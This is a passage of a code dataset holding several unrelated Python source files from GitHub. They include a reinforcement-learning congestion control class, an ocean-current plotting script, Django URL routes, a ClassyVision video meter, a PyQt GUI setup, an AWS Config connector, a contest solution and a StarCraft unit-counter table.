self.hyperparameters['Actions']['DECREASE_DRAMATIC']:\n self.cwnd = max(self.cwnd * (1 - self.hyperparameters['DRAMATIC_PERCENT_CHANGE']), 1)\n elif action == self.hyperparameters['Actions']['STAY']:\n self.cwnd = self.cwnd\n elif action == self.hyperparameters['Actions']['UPDATE_WMAX']:\n self.w_max = self.cwnd\n elif action == self.hyperparameters['Actions']['RESET_CONGESTION_AVOIDANCE_TIME']:\n self.time_since_last_drop = time.time()\n\n def update_q_function(self, seq_num: int, rtt: float = None, dropped_packet: bool = False):\n # Update Q Function\n\n if self.next_packet_rewards.get(seq_num):\n \"\"\"In this function, we can now construct state, reward & next state, and add to the Q function\"\"\"\n sequence_range, action = self.next_packet_rewards.get(seq_num)\n\n state = self.compute_state(*sequence_range)\n next_state = self.compute_state(max(seq_num - self.hyperparameters['STATE_WINDOW_SIZE'], 0), seq_num)\n\n reward = self.compute_reward(rtt, action, dropped_packet)\n\n self.transitions.append(\n Transition(\n self.state_to_tensor(state).unsqueeze(0),\n action,\n self.state_to_tensor(next_state).unsqueeze(0),\n torch.tensor([reward], device=self.device, dtype=torch.float)\n )\n )\n loss = optimize_model(\n policy_net=self.policy_net,\n target_net=self.target_net,\n device=self.device,\n optimizer=self.optimizer,\n transitions=self.transitions,\n batch_size=self.hyperparameters['BATCH_SIZE'],\n reward_decay=self.hyperparameters['REWARD_DECAY']\n )\n self.losses.append(loss)\n\n del self.next_packet_rewards[seq_num]\n\n def compute_state(self, begin: int, end: int) -> List[Dict]:\n return list(list(zip(*sorted([(seq_num, state)\n for seq_num, state in self.sequence_history_dict.items()\n if seq_num >= begin and seq_num <= end], key=itemgetter(0))[-self.hyperparameters['STATE_WINDOW_SIZE']:]))[1])\n\n def compute_reward(self, rtt: float, action: int, dropped_packet: bool):\n if dropped_packet:\n return self.hyperparameters['Rewards']['DROPPED_PACKET']\n elif rtt > (self.base_rtt * 10):\n return self.hyperparameters['Rewards']['RTT_IS_WAY_TOO_BIG']\n elif rtt > (self.base_rtt * self.hyperparameters['RTT_DRAMATIC_CHANGE_THRESHOLD']):\n return self.hyperparameters['Rewards']['DRAMATIC_RTT_INCREASE']\n elif rtt > (self.base_rtt * self.hyperparameters['RTT_CHANGE_THRESHOLD']):\n return self.hyperparameters['Rewards']['INCREASED_RTT']\n elif rtt > (self.base_rtt * 1.4):\n return self.hyperparameters['Rewards']['MINOR_RTT_INCREASE']\n elif action == self.hyperparameters['Actions']['INCREASE_QUADRATIC']:\n return self.hyperparameters['Rewards']['INCREASED_CWND_PERCENTAGE']\n elif action == self.hyperparameters['Actions']['INCREASE_ABSOLUTE']:\n return self.hyperparameters['Rewards']['INCREASED_CWND_ABSOLUTE']\n else:\n return self.hyperparameters['Rewards']['NO_REWARD']\n","repo_name":"squidarth/network-performance-jupyter","sub_path":"src/ml_strategy.py","file_name":"ml_strategy.py","file_ext":"py","file_size_in_byte":13097,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"37630542544","text":"import datetime as dt\n\nimport ioos_model_comparisons.configs as conf\nimport numpy as np\nimport pandas as pd\nfrom ioos_model_comparisons.platforms import (get_active_gliders, \n get_argo_floats_by_time,\n get_bathymetry)\nfrom ioos_model_comparisons.plotting_ugos import surface_current_fronts_single\n\nfrom ioos_model_comparisons.regions import region_config\nimport matplotlib\nimport time\nfrom pathlib import Path\nimport xarray as xr\n\n# Directory where the file should be downloaded\n# ddir = Path('/Users/mikesmith/data/tops/')\nddir = Path('/home/hurricaneadm/data/tops/')\n\nstartTime = time.time() # Start time to see how long the script took\nmatplotlib.use('agg')\n\n# Set path to save plots\npath_save = (conf.path_plots / \"maps\")\n\n# initialize keyword arguments for map plots\nkwargs = dict()\nkwargs['transform'] = conf.projection\nkwargs['dpi'] = conf.dpi\nkwargs['overwrite'] = True\n\n# Get yesterday dates\nnow = dt.datetime.now()\n\n# Subtract one day from the current date to get yesterday's date\nyesterday = now - dt.timedelta(days=1)\ntomorrow = now + dt.timedelta(days=1)\n\nfor d in [yesterday, now, tomorrow]:\n \n # Format the date\n formatted_date_1 = yesterday.strftime('%Y%m%d')\n formatted_date_2 = d.strftime('%Y%m%d')\n\n # Formatter for time\n tstr = '%Y-%m-%d %H:%M:%S'\n\n # This is the initial time to start the search for argo/gliders\n search_start = d - dt.timedelta(hours=conf.search_hours)\n\n region = region_config('gom') #gom, loop_current, yucatan\n extent = region['extent']\n print(f'Region: {region[\"name\"]}, Extent: {extent}')\n kwargs['path_save'] = path_save / region['folder']\n if conf.argo:\n argo_data = get_argo_floats_by_time(extent, search_start, d)\n else:\n argo_data = pd.DataFrame()\n\n if conf.gliders:\n glider_data = get_active_gliders(extent, search_start, d, parallel=False)\n else:\n glider_data = pd.DataFrame()\n\n if conf.bathy:\n bathy_data = get_bathymetry(extent)\n\n # The name we want to give to the downloaded file\n file_name = f'tops_compositem_{formatted_date_1}_{formatted_date_2}.nc'\n\n fname = ddir / yesterday.strftime('%Y/%m') / file_name\n\n # Load TOPS\n tops = xr.open_dataset(fname).rename({'uvel': 'u', 'vvel': 'v'})\n tops.attrs['model'] = 'TOPS'\n\n # Deal with time related variables\n ctime = yesterday\n search_window_t0 = (ctime - dt.timedelta(hours=conf.search_hours)).strftime(tstr)\n search_window_t1 = ctime.strftime(tstr) \n\n try:\n topst = tops.sel(depth=0)\n print(f\"TOPS: True\")\n tops_flag = True\n except KeyError as error:\n print(f\"TOPS: False - {error}\")\n tops_flag = False\n \n print(\"\\n\")\n\n if 'eez' in region:\n kwargs[\"eez\"] = region[\"eez\"]\n\n if 'figure' in region:\n if 'legend' in region['figure']:\n kwargs['cols'] = region['figure']['legend']['columns']\n\n if 'figsize' in region['figure']:\n kwargs['figsize'] = region['figure']['figsize']\n\n try:\n kwargs['bathy'] = bathy_data.sel(\n longitude=slice(extent[0] - 1, extent[1] + 1),\n latitude=slice(extent[2] - 1, extent[3] + 1)\n )\n except NameError:\n pass\n \n extended = np.add(extent, [-1, 1, -1, 1]).tolist()\n\n tops_sub = topst.sel(\n lon=slice(extended[0], extended[1]),\n lat=slice(extended[2], extended[3])\n ).set_coords(['u', 'v'])\n\n # Check if any asset data exists and subset to appropriate region and time\n # Was any argo data downloaded?\n if not argo_data.empty:\n argo_lon = argo_data['lon']\n argo_lat = argo_data['lat']\n argo_region = argo_data[\n (extended[0] <= argo_lon) & (argo_lon <= extended[1]) & (extended[2] <= argo_lat) & (argo_lat <= extended[3])\n ]\n argo_region.sort_index(inplace=True)\n idx = pd.IndexSlice\n kwargs['argo'] = argo_region.loc[idx[:, search_window_t0:search_window_t1], :]\n\n # Was any glider data downloaded?\n if not glider_data.empty:\n glider_lon = glider_data['lon']\n glider_lat = glider_data['lat']\n glider_region = glider_data[\n (extended[0] <= glider_lon) & (glider_lon <= extended[1]) & (extended[2] <= glider_lat) & (glider_lat <= extended[3])\n ]\n glider_region = glider_region[\n (search_window_t0 <= glider_region.index.get_level_values('time'))\n &\n (glider_region.index.get_level_values('time') <= search_window_t1)\n ]\n kwargs['gliders'] = glider_region\n\n try:\n surface_current_fronts_single(tops_sub.squeeze(), region, **kwargs)\n except Exception as e:\n print(f\"Failed to process TOPS at {ctime}\")\n print(f\"Error: {e}\")","repo_name":"rucool/ioos_model_comparisons","sub_path":"scripts/maps/models/synchronous/surface_current_contour_gom_tops.py","file_name":"surface_current_contour_gom_tops.py","file_ext":"py","file_size_in_byte":4815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"21242314726","text":"\"\"\"CYOAGen URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\n\nfrom .views import AdventureListView, AdventureDetailView, AdventureUpdateView, AdventureCreateView, RoomPlayView, register_view\n\nurlpatterns = [\n path('', AdventureListView.as_view(), name= 'adventure-list'),\n path('register/', register_view, name=\"register\"),\n path('create/', AdventureCreateView.as_view(), name= 'adventure-create'),\n path('/', AdventureDetailView.as_view(), name= 'adventure-detail'),\n path('/edit', AdventureUpdateView.as_view(), name= 'adventure-update'),\n path('//play', RoomPlayView.as_view(), name = 'play-room'),\n]\n","repo_name":"icynewyear/cyoa-django","sub_path":"adventure/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20079685964","text":"import logging\n\nimport torch\nfrom classy_vision.meters import ClassyMeter\n\n\nclass VideoMeter(ClassyMeter):\n \"\"\"An abstraction of meter for evaluating video models.\n\n Video-level metric is computed by averaging clip-level predictions and\n compare the result with video-level groundtruth label.\n\n This meter abstraction can wrap conventional classy meters by passing\n averaged clip-level predictions to the meter needed for video level metrics.\n \"\"\"\n\n def __init__(self, clips_per_video_train, clips_per_video_test):\n \"\"\"Constructor of VideoMeter class.\n\n Args:\n clips_per_video_train: No. of clips sampled per video at train time\n clips_per_video_test: No. of clips sampled per video at test time\n \"\"\"\n super().__init__()\n\n self._clips_per_video_train = clips_per_video_train\n self._clips_per_video_test = clips_per_video_test\n\n @property\n def value(self):\n return self.meter.value\n\n def sync_state(self):\n self.meter.sync_state()\n\n @property\n def meter(self) -> \"ClassyMeter\":\n \"\"\"Every video meter should implement to have its own internal meter.\n\n It consumes the video level predictions and ground truth label, and compute\n the actual metrics.\n\n Returns:\n An instance of ClassyMeter.\n \"\"\"\n raise NotImplementedError\n\n def get_classy_state(self):\n \"\"\"Contains the states of the meter.\"\"\"\n state = {}\n state[\"meter_state\"] = self.meter.get_classy_state()\n state[\"name\"] = self.name\n state[\"clips_per_video_train\"] = self._clips_per_video_train\n state[\"clips_per_video_test\"] = self._clips_per_video_test\n return state\n\n def set_classy_state(self, state):\n assert (\n self.name == state[\"name\"]\n ), \"State name {state_name} does not match meter name {obj_name}\".format(\n state_name=state[\"name\"], obj_name=self.name\n )\n assert (\n self._clips_per_video_train == state[\"clips_per_video_train\"]\n ), \"incompatible clips_per_video_train for video accuracy\"\n assert (\n self._clips_per_video_test == state[\"clips_per_video_test\"]\n ), \"incompatible clips_per_video_test for video accuracy\"\n # Restore the state -- correct_predictions and sample_count.\n self.reset()\n self.meter.set_classy_state(state[\"meter_state\"])\n\n def update(self, model_output, target, is_train, **kwargs):\n \"\"\"Updates any internal state of meter with new model output and target.\n\n Args:\n model_output: tensor of shape (B * clips_per_video, C) where each value is\n either logit or class probability.\n target: tensor of shape (B * clips_per_video).\n is_train if True, it is training stage when meter is updated\n\n Note: For binary classification, C=2.\n \"\"\"\n num_clips = len(model_output)\n clips_per_video = (\n self._clips_per_video_train if is_train else self._clips_per_video_test\n )\n\n if not num_clips % clips_per_video == 0:\n logging.info(\n \"Skip meter update. Because for video model testing, batch size \"\n \"is expected to be a multplier of No. of clips per video. \"\n \"num_clips: %d, clips_per_video: %d\" % (num_clips, clips_per_video)\n )\n return\n\n num_videos = num_clips // clips_per_video\n for i in range(num_videos):\n clip_labels = target[i * clips_per_video : (i + 1) * clips_per_video]\n if clip_labels.ndim == 1:\n # single label\n assert (\n len(torch.unique(clip_labels)) == 1\n ), \"all clips from the same video should have same label\"\n elif clip_labels.ndim == 2:\n # multi-hot label\n for j in range(1, clip_labels.shape[0]):\n assert torch.equal(\n clip_labels[0], clip_labels[j]\n ), \"all clips from the same video should have the same labels\"\n else:\n raise ValueError(\n \"dimension of clip label matrix should be either 1 or 2\"\n )\n\n video_model_output = torch.mean(\n torch.reshape(model_output, (num_videos, clips_per_video, -1)), 1\n )\n video_target = target[::clips_per_video]\n self.meter.update(video_model_output, video_target)\n\n def reset(self):\n self.meter.reset()\n\n def validate(self, model_output_shape, target_shape):\n self.meter.validate(model_output_shape, target_shape)\n","repo_name":"facebookresearch/ClassyVision","sub_path":"classy_vision/meters/video_meter.py","file_name":"video_meter.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","stars":1563,"dataset":"github-code","pt":"3"}
+{"seq_id":"26122496496","text":"from PyQt5.QtCore import QMetaObject, QCoreApplication, Qt\nfrom PyQt5.QtGui import QIntValidator, QIcon\nfrom PyQt5.QtWidgets import QWidget, QGridLayout, QVBoxLayout, QHBoxLayout, QTabWidget, QPushButton, QApplication, \\\n QMainWindow, QLineEdit, QCheckBox\n\nimport customlogger as logger\nfrom chihiro import ROOT_DIR\nfrom gui.events.calculator_view_events import ToggleUnitLockingOptionsVisibilityEvent\nfrom gui.events.chart_viewer_events import PopupChartViewerEvent\nfrom gui.events.service.tips_refresher_service import kill_tip_refresher_service\nfrom gui.events.state_change_events import ShutdownTriggeredEvent, BackupFlagsEvent\nfrom gui.events.utils import eventbus\nfrom gui.viewmodels.card import CardView, CardModel, IconLoaderView, IconLoaderModel\nfrom gui.viewmodels.potential import PotentialView, PotentialModel\nfrom gui.viewmodels.quicksearch import QuickSearchView, QuickSearchModel, SongQuickSearchView, SongQuickSearchModel\nfrom gui.viewmodels.simulator.wide_smart import MainView, MainModel\nfrom gui.viewmodels.song import SongView, SongModel\nfrom gui.viewmodels.tips_view import TipView\nfrom gui.viewmodels.unit import UnitView, UnitModel\nfrom logic.profile import profile_manager, unit_storage\nfrom logic.search import indexer, search_engine\n\n\nclass CustomMainWindow(QMainWindow):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def setui(self, ui):\n self.ui = ui\n\n def keyPressEvent(self, event):\n key = event.key()\n if QApplication.keyboardModifiers() == Qt.ControlModifier and key == Qt.Key_F:\n self.ui.quicksearch_view.focus()\n if QApplication.keyboardModifiers() == (Qt.ShiftModifier | Qt.ControlModifier) and key == Qt.Key_F:\n self.ui.songsearch_view.focus()\n if QApplication.keyboardModifiers() == (Qt.ShiftModifier | Qt.ControlModifier) and key == Qt.Key_H:\n eventbus.eventbus.post(ToggleUnitLockingOptionsVisibilityEvent())\n if QApplication.keyboardModifiers() == Qt.ControlModifier and key == Qt.Key_S:\n logger.info(\"User data backed up\")\n eventbus.eventbus.post(ShutdownTriggeredEvent())\n eventbus.eventbus.post(BackupFlagsEvent())\n unit_storage.clean_all_units(grand=False)\n for r_idx in range(self.ui.unit_view.widget.count()):\n widget = self.ui.unit_view.widget.itemWidget(self.ui.unit_view.widget.item(r_idx))\n widget.update_unit()\n profile_manager.cleanup()\n\n def closeEvent(self, event):\n eventbus.eventbus.post(ShutdownTriggeredEvent())\n eventbus.eventbus.post(BackupFlagsEvent())\n event.accept()\n\n# noinspection PyAttributeOutsideInit\nclass UiMainWindow:\n def __init__(self, main):\n self.main = main\n\n def setup_ui(self):\n logger.info(\"Initializing UI\")\n self.main.resize(1850, 1000)\n self.setup_base()\n self.setup_calculator_song_layout()\n self.setup_card_unit_layout()\n self.setup_tip_view()\n self.main.setCentralWidget(self.central_widget)\n self.retranslate_ui(self.main)\n QMetaObject.connectSlotsByName(self.main)\n\n def setup_base(self):\n logger.info(\"Setting up UI base\")\n\n self.central_widget = QWidget(self.main)\n self.grid_layout = QGridLayout(self.central_widget)\n self.main_layout = QVBoxLayout()\n\n def setup_tip_view(self):\n self.tip_view = TipView()\n self.grid_layout.addWidget(self.tip_view, 1, 0, 1, 1)\n\n def setup_calculator_song_layout(self):\n logger.info(\"Setting up calculator and song layouts\")\n\n self.calculator_song_layout = QHBoxLayout()\n self.calculator = QTabWidget(self.central_widget)\n self.calculator_view = MainView()\n self.calculator_model = MainModel(self.calculator_view)\n self.calculator_view.set_model(self.calculator_model)\n self.calculator_view.setup()\n self.potential_view = PotentialView()\n self.potential_model = PotentialModel(self.potential_view)\n self.potential_view.set_model(self.potential_model)\n self.potential_model.initialize_data()\n self.calculator.addTab(self.calculator_view.widget, \"Simulator\")\n self.calculator.addTab(self.potential_view.widget, \"Potentials\")\n self.calculator_song_layout.addWidget(self.calculator)\n self.song_layout = QVBoxLayout()\n\n self.import_layout = QHBoxLayout()\n self.import_text = QLineEdit(self.main)\n self.import_text.setPlaceholderText(\"Input user ID (9 digits, e.g. 123456789)\")\n self.import_text.setValidator(QIntValidator(0, 999999999, None)) # Only number allowed\n self.calculator_view.setUserID(self.import_text)\n self.import_button = QPushButton(\"Import from ID\", self.main)\n self.import_button.pressed.connect(lambda: self.import_from_id(self.import_text.text()))\n self.import_layout.addWidget(self.import_text)\n self.import_layout.addWidget(self.import_button)\n self.song_layout.addLayout(self.import_layout)\n\n self.song_view = SongView(self.central_widget)\n self.song_model = SongModel(self.song_view)\n self.song_model.initialize_data()\n self.song_view.set_model(self.song_model)\n self.song_layout.addWidget(self.song_view.widget)\n self.songsearch_view = SongQuickSearchView(self.central_widget)\n self.songsearch_model = SongQuickSearchModel(self.songsearch_view, self.song_view)\n self.songsearch_view.set_model(self.songsearch_model)\n hl = QHBoxLayout()\n hl.addWidget(self.songsearch_view.widget)\n chart_viewer_button = QPushButton(\"Popup Chart Viewer\")\n hl.addWidget(chart_viewer_button)\n chart_viewer_button.pressed.connect(lambda: eventbus.eventbus.post(PopupChartViewerEvent(look_for_chart=True)))\n self.song_layout.addLayout(hl)\n\n self.calculator_song_layout.addLayout(self.song_layout)\n self.calculator_song_layout.setStretch(0, 3)\n self.calculator_song_layout.setStretch(1, 2)\n self.main_layout.addLayout(self.calculator_song_layout)\n self.calculator.setCurrentIndex(0)\n\n def setup_card_unit_layout(self):\n logger.info(\"Setting up card and unit layouts\")\n\n self.card_unit_layout = QHBoxLayout()\n self.card_layout = QVBoxLayout()\n self.card_quicksearch_layout = QHBoxLayout()\n\n self.quicksearch_layout = QHBoxLayout()\n\n # Set up card MV first\n self.card_view = CardView(self.central_widget)\n self.card_model = CardModel(self.card_view)\n self.card_view.set_model(self.card_model)\n self.card_model.initialize_cards()\n self.card_view.initialize_pics()\n self.card_view.connect_cell_change()\n self.card_layout.addWidget(self.card_view.widget)\n\n # Need card view\n self.quicksearch_view = QuickSearchView(self.central_widget)\n self.quicksearch_model = QuickSearchModel(self.quicksearch_view, self.card_view)\n self.quicksearch_view.set_model(self.quicksearch_model)\n self.card_quicksearch_layout.addLayout(self.quicksearch_layout)\n self.quicksearch_layout.addWidget(self.quicksearch_view.widget)\n self.highlight_checkbox = QCheckBox(self.central_widget)\n self.highlight_checkbox.setText(\"Highlight Carnival Idols\")\n self.highlight_checkbox.clicked.connect(lambda _: self.card_model.highlight_event_cards(_))\n self.quicksearch_layout.addWidget(self.highlight_checkbox)\n self.quicksearch_model.add_options(self.quicksearch_layout, self.central_widget)\n\n # Then icon loader MV since it makes use of the card model\n self.icon_loader_view = IconLoaderView(self.central_widget)\n self.icon_loader_model = IconLoaderModel(self.icon_loader_view, self.card_model)\n self.icon_loader_view.set_model(self.icon_loader_model)\n self.icon_loader_view.widget.setToolTip(\"Larger icons require more RAM to run.\")\n self.icon_loader_model.load_image(0)\n self.card_quicksearch_layout.addWidget(self.icon_loader_view.widget)\n self.card_layout.addLayout(self.card_quicksearch_layout)\n\n self.card_layout.setStretch(1, 1)\n\n self.unit_layout = QVBoxLayout()\n self.unit_view = UnitView(self.central_widget)\n self.unit_model = UnitModel(self.unit_view)\n self.unit_view.set_model(self.unit_model)\n self.unit_model.initialize_units()\n self.unit_layout.addWidget(self.unit_view.widget)\n\n self.card_unit_layout.addLayout(self.unit_layout)\n self.card_unit_layout.addLayout(self.card_layout)\n\n self.add_unit_button = QPushButton()\n self.add_unit_button.setText(\"Add unit\")\n self.add_unit_button.setToolTip(\n \"Add an untitled unit. Untitled units are not saved upon exit!\\n\"\n \"Make sure to give your units a name. Unit names must be different.\\n\"\n \"First/Red card is the leader, last/blue card is the guest.\")\n self.add_unit_button.clicked.connect(lambda: self.unit_view.add_empty_widget())\n self.unit_layout.addWidget(self.add_unit_button)\n\n self.card_unit_layout.setStretch(0, 1)\n self.card_unit_layout.setStretch(1, 2)\n self.main_layout.addLayout(self.card_unit_layout)\n self.grid_layout.addLayout(self.main_layout, 0, 0, 1, 1)\n\n def import_from_id(self, game_id):\n self.card_view.disconnect_cell_change()\n updated_card_ids = profile_manager.import_from_gameid(game_id)\n if updated_card_ids is None:\n self.card_view.connect_cell_change()\n return\n indexer.im.initialize_index_db(updated_card_ids)\n indexer.im.reindex(updated_card_ids)\n search_engine.engine.refresh_searcher()\n self.card_model.initialize_cards(updated_card_ids)\n self.card_view.connect_cell_change()\n\n def retranslate_ui(self, MainWindow):\n _translate = QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"main\", \"Chihiro\"))\n\n def disable_auto_resize(self):\n self.card_view.toggle_auto_resize(False)\n\n\ndef cleanup():\n logger.info(\"Waiting for all threads to finish...\")\n kill_tip_refresher_service()\n\n\ndef setup_gui(*args):\n app = QApplication(*args)\n app.setApplicationName(\"Chihiro\")\n icon = QIcon(str(ROOT_DIR / 'icon.png'))\n app.setWindowIcon(icon)\n app.lastWindowClosed.connect(lambda: cleanup())\n MainWindow = CustomMainWindow()\n ui = UiMainWindow(MainWindow)\n MainWindow.setui(ui)\n ui.setup_ui()\n ui.disable_auto_resize()\n logger.info(\"GUI setup successfully\")\n return app, MainWindow\n","repo_name":"deresute-tools/deresute-tools","sub_path":"src/gui/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10675,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"}
+{"seq_id":"25221499745","text":"import logging\nfrom typing import List\n\nfrom cloudforet.plugin.connector.aws_boto_connector import AWSBotoConnector\n\n__all__ = ['AWSConfigConnector']\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass AWSConfigConnector(AWSBotoConnector):\n\n def init_client(self, region_name: str):\n self.client = self.session.client('config', region_name=region_name)\n\n def describe_conformance_packs(self):\n response = self.client.describe_conformance_packs()\n return response.get('ConformancePackDetails', [])\n\n def describe_conformance_pack_compliance(self, pack_name: str):\n response = self.client.describe_conformance_pack_compliance(ConformancePackName=pack_name)\n return response.get('ConformancePackRuleComplianceList', [])\n\n def get_compliance_details_by_config_rule(self, rule_name: str):\n return self.client.get_compliance_details_by_config_rule(ConfigRuleName=rule_name)\n\n def get_conformance_pack_compliance_details(self, pack_name: str, results: List[dict] = None,\n next_token: str = None):\n results = results or []\n kwargs = {\n 'ConformancePackName': pack_name\n }\n\n if next_token:\n kwargs['NextToken'] = next_token\n\n response = self.client.get_conformance_pack_compliance_details(**kwargs)\n results += response.get('ConformancePackRuleEvaluationResults', [])\n\n if 'NextToken' in response:\n self.get_conformance_pack_compliance_details(pack_name, results, response['NextToken'])\n\n return results\n\n def describe_config_rules(self, rule_names: List[str]):\n config_rules = []\n for items in self._page_by_size(rule_names, 25):\n response = self.client.describe_config_rules(ConfigRuleNames=items)\n config_rules += response.get('ConfigRules', [])\n\n return config_rules\n\n @staticmethod\n def _page_by_size(items: List[str], size: int):\n page_count = int(len(items) / size) + 1\n\n for num in range(page_count):\n offset = size * num\n yield items[offset:offset + size]\n","repo_name":"cloudforet-io/plugin-aws-config-inven-collector","sub_path":"src/cloudforet/plugin/connector/aws_config_connector.py","file_name":"aws_config_connector.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"44828231869","text":"#206 C\n\nfrom collections import Counter\n\nn = int(input())\nN = [int(i) for i in range(n)]\nA = list(map(int, input().split()))\nA_ = Counter(A)\nans = 0\ntotal = 0\n\nfor i in range(len(A) - 1, 0, -1):\n ans += i\n\nfor j in A_:\n count = 0\n if A_[j] != 1:\n for k in range(1, A_[j]):\n count += k\n ans = ans - count\n\nprint(ans)","repo_name":"ar20190114/atcoder_206","sub_path":"atcoder2.py","file_name":"atcoder2.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29353823950","text":"import numpy as np\r\n\r\n\r\ndef strongAgainst(a, b):\r\n stronger.add((units[a], units[b]))\r\n\r\ndef weakAgainst(a, b):\r\n strongAgainst(b, a)\r\n\r\ndef makeStrongerRelation():\r\n strongAgainst('Marine', 'Marauder')\r\n strongAgainst('Marine', 'Hydralisk')\r\n strongAgainst('Marine', 'Immortal')\r\n weakAgainst ('Marine', 'Siege Tank')\r\n weakAgainst ('Marine', 'Baneling')\r\n weakAgainst ('Marine', 'Colossus')\r\n\r\n strongAgainst('Marauder', 'Thor')\r\n strongAgainst('Marauder', 'Roach')\r\n strongAgainst('Marauder', 'Stalker')\r\n weakAgainst ('Marauder', 'Marine')\r\n weakAgainst ('Marauder', 'Zergling')\r\n weakAgainst ('Marauder', 'Zealot')\r\n\r\n strongAgainst('Reaper', 'SCV')\r\n strongAgainst('Reaper', 'Drone')\r\n strongAgainst('Reaper', 'Probe')\r\n weakAgainst ('Reaper', 'Marauder')\r\n weakAgainst ('Reaper', 'Roach')\r\n weakAgainst ('Reaper', 'Stalker')\r\n\r\n strongAgainst('Ghost', 'Raven')\r\n strongAgainst('Ghost', 'Infestor')\r\n strongAgainst('Ghost', 'High Templar')\r\n weakAgainst ('Ghost', 'Marauder')\r\n weakAgainst ('Ghost', 'Zergling')\r\n weakAgainst ('Ghost', 'Stalker')\r\n\r\n strongAgainst('Hellion', 'Zergling')\r\n strongAgainst('Hellion', 'Zealot')\r\n weakAgainst ('Hellion', 'Marauder')\r\n weakAgainst ('Hellion', 'Roach')\r\n weakAgainst ('Hellion', 'Stalker')\r\n\r\n strongAgainst('Hellbat', 'Zergling')\r\n strongAgainst('Hellbat', 'Zealot')\r\n weakAgainst ('Hellbat', 'Marauder')\r\n weakAgainst ('Hellbat', 'Baneling')\r\n weakAgainst ('Hellbat', 'Stalker')\r\n\r\n strongAgainst('Siege Tank', 'Marine')\r\n strongAgainst('Siege Tank', 'Hydralisk')\r\n strongAgainst('Siege Tank', 'Stalker')\r\n weakAgainst ('Siege Tank', 'Banshee')\r\n weakAgainst ('Siege Tank', 'Mutalisk')\r\n weakAgainst ('Siege Tank', 'Immortal')\r\n\r\n strongAgainst('Thor', 'Marine')\r\n strongAgainst('Thor', 'Mutalisk')\r\n strongAgainst('Thor', 'Stalker')\r\n weakAgainst ('Thor', 'Marauder')\r\n weakAgainst ('Thor', 'Zergling')\r\n weakAgainst ('Thor', 'Immortal')\r\n\r\n strongAgainst('Viking', 'Battlecruiser')\r\n strongAgainst('Viking', 'Corruptor')\r\n strongAgainst('Viking', 'Void Ray')\r\n weakAgainst ('Viking', 'Marine')\r\n weakAgainst ('Viking', 'Mutalisk')\r\n weakAgainst ('Viking', 'Stalker')\r\n\r\n strongAgainst('Raven', 'Banshee')\r\n strongAgainst('Raven', 'Roach')\r\n strongAgainst('Raven', 'Dark Templar')\r\n weakAgainst ('Raven', 'Viking')\r\n weakAgainst ('Raven', 'Hydralisk')\r\n weakAgainst ('Raven', 'Phoenix')\r\n\r\n strongAgainst('Battlecruiser', 'Thor')\r\n strongAgainst('Battlecruiser', 'Mutalisk')\r\n strongAgainst('Battlecruiser', 'Marine')\r\n weakAgainst ('Battlecruiser', 'Viking')\r\n weakAgainst ('Battlecruiser', 'Corruptor')\r\n weakAgainst ('Battlecruiser', 'Void Ray')\r\n\r\n strongAgainst('Widow Mine', 'Marauder')\r\n strongAgainst('Widow Mine', 'Roach')\r\n strongAgainst('Widow Mine', 'Immortal')\r\n weakAgainst ('Widow Mine', 'Raven')\r\n weakAgainst ('Widow Mine', 'Overseer')\r\n weakAgainst ('Widow Mine', 'Observer')\r\n\r\n strongAgainst('Liberator', 'Viking')\r\n strongAgainst('Liberator', 'Mutalisk')\r\n strongAgainst('Liberator', 'Phoenix')\r\n weakAgainst ('Liberator', 'Battlecruiser')\r\n weakAgainst ('Liberator', 'Corruptor')\r\n weakAgainst ('Liberator', 'Carrier')\r\n\r\n strongAgainst('Cyclone', 'Thor')\r\n strongAgainst('Cyclone', 'Ultralisk')\r\n strongAgainst('Cyclone', 'Immortal')\r\n weakAgainst ('Cyclone', 'Marine')\r\n weakAgainst ('Cyclone', 'Zergling')\r\n weakAgainst ('Cyclone', 'Zealot')\r\n \r\n strongAgainst('Zealot', 'Marauder')\r\n strongAgainst('Zealot', 'Zergling')\r\n strongAgainst('Zealot', 'Immortal')\r\n weakAgainst ('Zealot', 'Hellion')\r\n weakAgainst ('Zealot', 'Roach')\r\n weakAgainst ('Zealot', 'Colossus')\r\n\r\n strongAgainst('Stalker', 'Reaper')\r\n strongAgainst('Stalker', 'Mutalisk')\r\n strongAgainst('Stalker', 'Void Ray')\r\n weakAgainst ('Stalker', 'Marauder')\r\n weakAgainst ('Stalker', 'Zergling')\r\n weakAgainst ('Stalker', 'Immortal')\r\n\r\n strongAgainst('Sentry', 'Zergling')\r\n strongAgainst('Sentry', 'Zealot')\r\n weakAgainst ('Sentry', 'Reaper')\r\n weakAgainst ('Sentry', 'Hydralisk')\r\n weakAgainst ('Sentry', 'Stalker')\r\n\r\n strongAgainst('Immortal', 'Siege Tank')\r\n strongAgainst('Immortal', 'Roach')\r\n strongAgainst('Immortal', 'Stalker')\r\n weakAgainst ('Immortal', 'Marine')\r\n weakAgainst ('Immortal', 'Zergling')\r\n weakAgainst ('Immortal', 'Zealot')\r\n\r\n strongAgainst('Colossus', 'Marine')\r\n strongAgainst('Colossus', 'Zergling')\r\n strongAgainst('Colossus', 